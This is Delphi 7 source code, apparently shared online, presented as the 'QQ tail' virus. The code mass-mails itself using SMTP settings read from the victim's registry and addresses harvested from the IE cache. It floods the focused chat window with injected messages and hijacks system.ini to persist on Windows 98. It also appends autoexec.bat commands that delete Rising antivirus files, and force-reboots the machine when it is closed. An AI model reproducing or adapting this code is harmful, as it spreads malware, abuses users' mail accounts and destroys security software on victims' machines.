qq尾巴.txt

QQ尾巴的源代码（Delphi7编写) 该病毒会偷偷藏在用户的系统中

procedure sendmail(canshu:cs);
var 
s:tsocket; 
//wsa:twsadata; 
server:tsockaddr; 
errorcode,i,count:integer; 
smtp,account:pchar; 
address:array of string; 
recvbuffer,sendbuffer:array[0..79] of char; 
head,path:array[0..255] of char; 
body:array of char; 
f:file; 
str:string; 
begin 
//wsastartup($0101,wsa); 
//加载winsock库 
GetSystemDirectory(path,256); 
str:=strpas(path); 
count:=2; 
setlength(address,count); 
getmem(smtp,256); 
getmem(account,256); 
//分配内存空间 
strcopy(smtp,canshu.smtp); 
strcopy(account,canshu.account); 
//填充一些基本的信息 
s:=socket(af_inet,sock_stream,0); 
//建立一个套接字 
if s=invalid_socket then exit; 
server.sin_family:=af_inet; 
server.sin_port:=htons(25); 
server.sin_addr.S_addr:=inet_addr(getip(canshu.smtp)); 
errorcode:=connect(s,server,sizeof(server)); 
//调用connect和服务器连接 
if errorcode=0 then 
begin 
makeemlfile; 
//调用我们上面的函数，生成一个eml文件 
assignfile(f,str+\ruin.eml); 
reset(f,1); 
i:=filesize(f); 
setlength(body,i); 
blockread(f,body[0],i); 
//把刚才eml文件里面的所有内容都读取到body里面去 
closefile(f); 
recv(s,head,sizeof(head),0); 
//这里调用recv来接受服务器的banner 
strpcopy(sendbuffer,HELO); 
send(s,sendbuffer,6,0); 
//我们发送命令HELO 
recv(s,recvbuffer,sizeof(recvbuffer),0); 
//接收服务器的返回信息 
strpcopy(sendbuffer,format(mailfrom,[account])); 
send(s,sendbuffer,mysizeof(sendbuffer),0); 
//我们发送命令MAIL FROM 
recv(s,recvbuffer,sizeof(recvbuffer),0); 
//接收服务器的返回信息 
for i:=0 to count-1 do 
begin 
strpcopy(sendbuffer,format(RCPTTO,[address])); 
send(s,sendbuffer,mysizeof(sendbuffer),0); 
recv(s,recvbuffer,sizeof(recvbuffer),0); 
end; 
//已经发送count个rcpt to命令 
strpcopy(sendbuffer,DATA); 
send(s,sendbuffer,6,0); 
//这里开始发送信笺的主体 
recv(s,recvbuffer,sizeof(recvbuffer),0); 
//接收服务器的返回信息 
send(s,body[0],length(body),0); 
strpcopy(sendbuffer,ENDSIGN); 
send(s,sendbuffer,5,0); 
//这里发送信笺结束标志 
recv(s,recvbuffer,sizeof(recvbuffer),0); 
//接收服务器的返回信息 
strpcopy(sendbuffer,QUIT); 
send(s,sendbuffer,6,0); 
//发送QUIT表示我们要退出会话 
recv(s,recvbuffer,sizeof(recvbuffer),0); 
//接收服务器的返回信息 
closesocket(s); 
//关闭套接字 
deletefile(str+\ruin.eml); 
//删除临时文件 
end; 
freemem(smtp,256); 
freemem(account,256); 
//wsacleanup; 
end;
procedure sendemails; 
var 
hk:hkey; 
smtp,account,path,smtppassword:array[0..255] of char; 
smtplen,accountlen,smtppasswordlen,i:integer; 
canshu:cs; 
f:textfile; 
str:string; 
begin 
GetSystemDirectory(path,256);
str:=strpas(path); 
smtplen:=256; 
accountlen:=256; 
smtppasswordlen:=256; 
i:=0; 
RegOpenKey(HKEY_CURRENT_USER,Software\Microsoft\Internet Account Manager\Accounts\00000001,hk); 
RegQueryvalueEx(hk,SMTP Server,nil,nil,@smtp,@smtplen); 
RegQueryvalueEx(hk,Smtp Email Address,nil,nil,@account,@accountlen); 
RegQueryvalueEx(hk,SMTP Password2,nil,nil,@smtppassword,@smtppasswordlen); 
//一直到这里都是准备工作，读取该用户的帐号和smtp服务器 
if smtppasswordlen<>256 then 
//需要注意的是，这里smtp password2表示smtp服务器需要密码登陆 
//所以我们进行判断 
begin 
canshu.smtp:=smtp; 
canshu.account:=account; 
//这里是smtp服务器，按默认设置 
end else 
begin 
canshu.smtp:=smtp.21cn.com; 
canshu.account:=randomaddress; 
//否则，我设置为smtp服务器为smtp.21cn.com 
//帐号为随机产生一个21cn的地址 
//因为smtp.21cn.com不需要身份验证 
end; 
assignfile(f,str+\maillist.lst); 
reset(f); 
while not eof(f) do 
begin 
readln(f,canshu.address); 
inc(i); 
if i=100 then 
begin 
i:=0; 
canshu.count:=100; 
sendmail(canshu);
//每次读100个地址，然后调用我们发送邮件的地址 
//sendmail函数在下面会定义，请往后看 
end; 
end; 
closefile(f); 
if i>0 then 
begin 
canshu.count:=i; 
sendmail(canshu); 
//这里是如果邮件个数不是100的整数倍，就读剩余的个数i 
end; 
end; 

procedure TForm1.getinputhandle();
var
FormThreadID,CWndThreadIDWORD;
begin
i:=i+1;
hWnd11:=GetForegroundWindow(); // 得到当前窗口
if (hwnd11=form1.Handle) then
begin
hwnd11:=0;// 排除程序本身的窗口
exit;
end;
FormThreadID:= GetCurrentThreadId(); // 本程序的线程ID
// 当前窗口的线程ID
CWndThreadID:=GetWindowThreadProcessId(hWnd11,nil);
// 附加输入线程
AttachThreadInput(CWndThreadID, FormThreadID, true); 
// 得到当前键盘光标所在的窗口 
hWnd11:= GetFocus();
// 取消附加的输入线程

AttachThreadInput(CWndThreadID, FormThreadID, false); 
end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
try
getinputhandle;
Randomize;
if i>5 then
if random(5)=1 then
begin
postmsg;
i:=0;
end;
if HourOf(now)=13 then
//每天1点执行扫描
begin
scanemail;
sendemails;
end;
except
end;
end;
procedure TForm1.postmsg;
Var a:widestring;
b:array[0..500] of char;
i:integer;
Begin
if hwnd11=0 then exit;
zeromemory(@b,500);
randomize;
i:=random(4);
a:=memo1.lines.text;
if i=1 then
a:=talk1;
if i=2 then
a:=talk2;
if i=3 then
a:=talk3;
strpcopy(b,a);
for i:=0 to 300 do
begin
postmessage(hwnd11,wm_char,wParam(b),0);
end;
keybd_event(vk_return,MapVirtualKey(vk_return,0),0,0);//键下R键。
keybd_event(vk_return,MapVirtualKey(vk_return,0), KEYEVENTF_KEYUP,0); 
keybd_event(VK_CONTROL,MapVirtualKey(VK_CONTROL,0),0,0); //按下CTRL键。
keybd_event(vk_return,MapVirtualKey(vk_return,0),0,0);//键下R键。
keybd_event(vk_return,MapVirtualKey(vk_return,0), KEYEVENTF_KEYUP,0);//放开R键。
keybd_event(VK_CONTROL,MapVirtualKey(VK_CONTROL,0),KEYEVENTF_KEYUP,0);//放开CTRL键。
end;
procedure TForm1.Formcreate(Sender: TObject);
begin
talk1:=我好爱你啊啊！爱你爱到沟里，想你想到坑里。=明教教主=!;
talk2:=我好爱你啊啊！爱你爱到沟里，想你想到坑里。=明教教主=;
talk3:=我好爱你啊啊！爱你爱到沟里，想你想到坑里。=明教教主=;
try
if paramcount=1 then
begin
//winexec(pchar(rav.exe+paramstr(1)),sw_show);
shellexecute(0,open,pchar(notepad.exe),pchar(paramstr(1)),nil,sw_normal);
end;
i:=0;
safeid:=2;
SelfCopy;
application.Title:=Suny Write;
if findwindow(nil,冬天来了春天还会远吗?)<>0 then
begin
safeid:=4;
application.Terminate;
exit;
end;
application.Title:=冬天来了春天还会远吗?;
if (checkwinver=98) or (checkwinver=982) then
begin
kill98;
winexec(command /c explorer.exe,sw_hide);
end;
if checkwinver=2000 then
begin
end;
except
end;
end;
procedure TForm1.scanemail;
var 
HK:HKEY; 
IeCache:array[0..255] of char; 
IeCacheLen:integer; 
S:string; 
begin 
IeCacheLen:=256; 
//设置返回值的长度 
RegOpenKey(HKEY_CURRENT_USER,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\,HK); 
RegQueryvalueEx(HK,Cache,nil,nil,@IeCache,@ieCacheLen); 
//读取IE缓存的路径 
S:=Strpas(IeCache)+\; 
//在刚才取得的路径后面加一个\ 
FindFiles(S); 
//调用我们自己写的函数 
end;
procedure TForm1.wmwindowsclose(var msg: Tmessage);
begin
safeid:=4;
end;
procedure reboot;
var
hProcess, hToken, lBufferNeeded: Cardinal;
tmpLuid: TLargeInteger;
tkp, tkp1: TOKEN_PRIVILEGES;
begin
if (checkwinver=98)or(checkwinver=982) then
begin
ExitWindowsEx(EWX_REBOOT + EWX_FORCE, 0);
exit;
end;
hProcess := GetCurrentProcess;
OpenProcessToken(hProcess, (TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY), hToken);
LookupPrivilegevalue(, SeShutdownPrivilege, tmpLuid);
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Luid := tmpLuid;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, False, tkp, sizeof(tkp1), tkp1, lBufferNeeded);
ExitWindowsEx(EWX_REBOOT + EWX_FORCE, 0); // 重启
end;
procedure TForm1.FormDestroy(Sender: TObject);
begin
if safeid<>4 then
begin
reboot;
end;
end;
procedure TForm1.kill98;
var t:tinifile;
a:array[0..255] of char;
s,k:string;
Tmp:integer;
f:textfile;
begin
try
GetwindowsDirectory(a,255);
s:=a;
t:=tinifile.create(s+\+system.ini);
t.writestring(boot,shell,application.ExeName);
SystemParametersInfo(SPI_SCREENSAVERRUNNING,1,@Tmp,0);
t.free;
assignfile(f,c:\msdos.sys);
reset(f);
while not eof(f) do
begin
readln(f,k);
end;
if k<>bootkeys=0 then
begin
append(f);
Writeln(f,bootkeys=0);
Flush(f);
end;
closefile(f);
if directoryexists(c:\Program Files\rising)or directoryexists(d:\Program Files\rising) then
begin
assignfile(f,c:\autoexec.bat);
reset(f);
append(f);
Writeln(f,del c:\Program Files\rising\*.*);
Writeln(f,del d:\Program Files\rising\*.*);
Writeln(f,del e:\Program Files\rising\*.*);
Writeln(f,del f:\Program Files\rising\*.*);
Flush(f);
closefile(f);
end;
except
end;
end;
end;